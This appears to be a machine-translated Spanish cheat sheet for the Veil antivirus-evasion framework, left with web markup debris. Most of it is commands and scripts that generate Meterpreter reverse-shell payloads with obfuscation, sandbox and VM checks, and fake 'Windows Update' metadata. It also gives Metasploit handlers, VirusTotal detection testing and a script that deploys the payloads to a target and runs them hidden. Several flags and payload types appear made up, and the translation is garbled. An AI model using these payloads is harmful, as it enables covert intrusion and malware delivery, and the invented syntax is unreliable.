Veil Cheat Sheet
"Clase de la hoja"
########################################################################################################################################################################################################################################################## Copiar todos los comandos
id="veil-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
Veil es una herramienta diseñada para generar cargas de pago metásploit que superan las soluciones antivirus comunes. Es parte del Veil-Framework y se centra en la generación de carga útil y la codificación para evitar la detección por software antivirus y sistemas de protección de endpoint. Veil soporta múltiples lenguajes de programación y técnicas de codificación para crear cargas de pago indetectables para pruebas de penetración y operaciones de equipo rojo.
NOVEDAD Advertencia: Únicamente utilice el Velo en entornos que posee o tenga permiso explícito para probar. El uso no autorizado puede violar términos de servicio o leyes locales. Esta herramienta está destinada únicamente a fines legítimos de pruebas de seguridad.
Instalación
Instalación automatizada
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --version
Instalación manual
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.py
Docker Instalación
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc
Kali Linux Instalación
# Veil is pre-installed on Kali Linux
veil
# If not installed, install via apt
sudo apt update
sudo apt install veil
# Update to latest version
cd /usr/share/veil
sudo git pull
Uso básico
Modo interactivo
# Start Veil in interactive mode
./Veil.py
# Or if installed system-wide
veil
# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)
Modo de línea de mando
# List available payloads
./Veil.py -t Evasion --list-payloads
# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads
# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options
Generación de carga útil
Python Payloads
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444
# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
C# Cargas de pago
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444
# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444
PowerShell Payloads
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444
Go Payloads
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"
Técnicas avanzadas de evacuación
Codificación y Obfuscación
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor
# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes
# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor
# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"
Técnicas antianálisis
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30
# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check
# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check
# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check
# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check
Opciones de carga de pago personalizadas
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico
# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"
# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"
# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"
# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service
Entrega de carga Métodos
Generación ejecutable
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe
# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll
# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service
# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode
# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1
Ordnance (Payload Delivery)
# Start Veil-Ordnance
./Veil.py -t Ordnance
# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
Integración con Metasploit
Handler Setup
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"
Scripts de recursos
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use resource script
msfconsole -r veil_handler.rc
# Multi-handler resource script
cat > multi_handler.rc ``<< 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF
Scripts de automatización
Batch Payload Generation
#!/bin/bash
# Generate multiple Veil payloads
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# Array of payload configurations
declare -a PAYLOADS=(
"python/meterpreter/rev_tcp:4444:python_tcp"
"python/meterpreter/rev_http:80:python_http"
"cs/meterpreter/rev_tcp:4445:cs_tcp"
"cs/meterpreter/rev_http:8080:cs_http"
"powershell/meterpreter/rev_tcp:4446:ps_tcp"
"go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
for payload_config in "$\\\{PAYLOADS[@]\\\}"; do
IFS=':' read -r payload port name <<< "$payload_config"
echo "[+] Generating $name ($payload:$port)"
./Veil.py -t Evasion \
-p "$payload" \
--ip "$LHOST" \
--port "$port" \
--output-dir "$OUTPUT_DIR" \
--output-name "$name" \
--force
if [ $? -eq 0 ]; then
echo " ✓ Success: $name"
else
echo " ✗ Failed: $name"
fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
# Generate Metasploit resource script
cat >`` "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"
Payload Testing Script
#!/bin/bash
# Test generated payloads against antivirus
PAYLOAD_DIR="$1"
VIRUSTOTAL_API_KEY="your_api_key_here"
if [ -z "$PAYLOAD_DIR" ]; then
echo "Usage: $0 <payload_directory>"
exit 1
fi
if [ ! -d "$PAYLOAD_DIR" ]; then
echo "Error: Directory not found: $PAYLOAD_DIR"
exit 1
fi
echo "[+] Testing payloads in: $PAYLOAD_DIR"
# Function to upload to VirusTotal
upload_to_vt() \\\\{
local file="$1"
local filename=$(basename "$file")
echo "[+] Uploading $filename to VirusTotal..."
response=$(curl -s -X POST \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
-F "file=@$file" \
"https://www.virustotal.com/api/v3/files")
if [ $? -eq 0 ]; then
scan_id=$(echo "$response"|jq -r '.data.id')
echo " Scan ID: $scan_id"
echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
echo " Upload failed"
fi
\\\\}
# Function to check scan results
check_vt_results() \\\\{
local scan_id="$1"
local filename="$2"
echo "[+] Checking results for $filename..."
response=$(curl -s -X GET \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
"https://www.virustotal.com/api/v3/analyses/$scan_id")
if [ $? -eq 0 ]; then
status=$(echo "$response"|jq -r '.data.attributes.status')
if [ "$status" = "completed" ]; then
stats=$(echo "$response"|jq -r '.data.attributes.stats')
malicious=$(echo "$stats"|jq -r '.malicious')
suspicious=$(echo "$stats"|jq -r '.suspicious')
undetected=$(echo "$stats"|jq -r '.undetected')
echo " Status: $status"
echo " Malicious: $malicious"
echo " Suspicious: $suspicious"
echo " Undetected: $undetected"
echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
else
echo " Status: $status (still processing)"
fi
else
echo " Failed to get results"
fi
\\\\}
# Upload all executables
echo "[+] Uploading payloads..."
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
upload_to_vt "$file"
sleep 15 # Rate limiting
fi
done
echo "[+] Waiting for scans to complete..."
sleep 300 # Wait 5 minutes
# Check results
if [ -f "$PAYLOAD_DIR/vt_scans.txt" ]; then
echo "filename,malicious,suspicious,undetected" > "$PAYLOAD_DIR/detection_results.csv"
while IFS=':' read -r filename scan_id; do
check_vt_results "$scan_id" "$filename"
sleep 15 # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"
echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
echo "[-] No scans to check"
fi
Payload Deployment Script
#!/bin/bash
# Deploy Veil payloads for testing
PAYLOAD_DIR="$1"
TARGET_HOST="$2"
TARGET_USER="$3"
if [ $# -ne 3 ]; then
echo "Usage: $0 <payload_directory> <target_host> <target_user>"
exit 1
fi
echo "[+] Deploying payloads to $TARGET_HOST"
# Create remote directory
ssh "$TARGET_USER@$TARGET_HOST" "mkdir -p /tmp/test_payloads"
# Copy payloads
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
filename=$(basename "$file")
echo "[+] Copying $filename..."
scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
if [ $? -eq 0 ]; then
echo " ✓ Copied successfully"
else
echo " ✗ Copy failed"
fi
fi
done
# Create execution script
cat > /tmp/execute_payloads.ps1 << 'EOF'
# PowerShell script to execute payloads
$payloadDir = "C:\tmp\test_payloads"
$logFile = "$payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\\\{
$payload = $_.FullName
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
Write-Host "[+] Executing: $($_.Name)"
Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"
try \\\\{
Start-Process -FilePath $payload -WindowStyle Hidden
Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
\\\\}
catch \\\\{
Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
\\\\}
Start-Sleep -Seconds 5
\\\\}
EOF
# Copy execution script
scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
echo "[+] Deployment completed"
echo "[+] To execute payloads on target:"
echo " ssh $TARGET_USER@$TARGET_HOST"
echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"
rm /tmp/execute_payloads.ps1
Pruebas de evasión
Análisis antivirus
# Test against Windows Defender
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender
# Test against multiple AV engines
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all
# Generate report
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report
# Custom AV testing
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"
Evasión de caja de arena
# Generate payload with sandbox evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--sandbox-evasion \
--sleep 60 \
--vm-check \
--debug-check
# Time-based evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--time-check \
--execution-delay 300
# Environment checks
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--domain-check \
--process-check \
--file-check
Solución de problemas
Cuestiones comunes
Problemas de instalación
# Fix missing dependencies
sudo apt update
sudo apt install -y python3-dev python3-pip
pip3 install --upgrade pip
# Fix Wine issues (for Windows compilation)
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
# Fix MinGW issues
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
# Reinstall Veil
cd Veil
sudo ./config/setup.sh --force
Errores de compilación
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc
# Fix C# compilation
sudo apt install mono-mcs mono-complete
# Fix Go compilation
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin
# Debug compilation
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
Cuestiones de carga
# Test payload generation
./Veil.py -t Evasion --list-payloads|grep meterpreter
# Check payload options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options
# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter
# Test payload execution
wine /var/lib/veil/output/compiled/payload.exe
Debugging y Logging
# Enable debug mode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
# Check Veil logs
tail -f /var/lib/veil/output/veil.log
# Verbose output
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose
# Check compilation output
cat /var/lib/veil/output/source/payload.cs
Recursos
- Marco oficial del velo
- Documentación del Veil
- Metasploit Framework
- Tecnicas de Evasión Antivirus
- Payload Generation Best Practices
- Windows PE Format
- Code Obfuscation Techniques
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Veil para la generación de carga y evasión antivirus. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *